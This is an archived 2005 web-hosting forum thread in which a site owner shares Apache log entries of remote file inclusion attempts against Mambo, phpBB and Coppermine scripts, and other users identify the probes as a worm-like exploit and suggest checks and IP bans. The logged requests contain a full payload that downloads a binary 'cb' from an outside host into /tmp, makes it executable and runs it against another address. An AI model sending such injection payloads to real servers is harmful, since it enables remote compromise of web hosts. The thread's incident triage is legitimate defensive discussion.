lerningkurv Posted December 12, 2005 Posted December 12, 2005 this turned up in last nites logs its got me a little worried wondering what apache returned in the two underlined entries !!! 213.133.109.66 - - [11/Dec/2005:19:58:52 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 213.133.109.66 - - [11/Dec/2005:19:58:54 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 200 13076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 213.133.109.66 - - [11/Dec/2005:19:58:55 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 213.133.109.66 - - [11/Dec/2005:19:58:56 -0500] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 213.133.109.66 - - [11/Dec/2005:19:58:57 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo| HTTP/1.1" 200 13076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 213.133.109.66 - - [11/Dec/2005:19:58:58 -0500] "GET /mambo/index.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo| HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 213.133.109.66 - - [11/Dec/2005:19:58:59 -0500] "GET /cvs/index.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo| HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 213.133.109.66 - - [11/Dec/2005:19:59:00 -0500] "GET /admin_styles.phpadmin_styles.php?phpbb_root_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 213.133.109.66 - - [11/Dec/2005:19:59:02 -0500] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 339 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 213.133.109.66 - - [11/Dec/2005:19:59:03 -0500] "GET /Forums/admin_styles.phpadmin_styles.php?phpbb_root_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 213.133.109.66 - - [11/Dec/2005:19:59:04 -0500] "GET /forum/admin_styles.phpadmin_styles.php?phpbb_root_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 213.133.109.66 - - [11/Dec/2005:19:59:05 -0500] "GET /modules/coppermine/themes/default/theme.phptheme.php?THEME_DIR=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo| HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
Guest Posted December 12, 2005 Posted December 12, 2005 looks like a scanner i get those all the time. people looking for security holes and unpatched software to be safe you should ban the ip via htaccess if the ip is from a country you do not service, ban the entire ip block
lerningkurv Posted December 12, 2005 Author Posted December 12, 2005 is it possible to know if the were successfull? apache returned a 200 twice
shindakun Posted December 12, 2005 Posted December 12, 2005 It is an active exploit, some sort of worm maybe - it is downloading a file called 'cb' which is a unix executable which then connects to another server (possibly DOS). Anyway, check /tmp for a file called cb (or asking your hosting provider to do it if you can't) .shin
Guest Posted December 12, 2005 Posted December 12, 2005 It is an active exploit, some sort of worm maybe how do you patch it / prevent it?
user99999999 Posted December 12, 2005 Posted December 12, 2005 Its a Mambo CMS exploit. http://forum.mamboserver.com/showthread.php?t=65881
shindakun Posted December 12, 2005 Posted December 12, 2005 how do you patch it / prevent it? Not sure... It doesn't seem work on my osCommerce install. I wonder if it's a contribution or something. Google didn't seem to turn up anything either. Wheee... Thanks for the info. .shin
lerningkurv Posted December 12, 2005 Author Posted December 12, 2005 so since i dont run mambo, Ive nothing to worry about? thanks
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.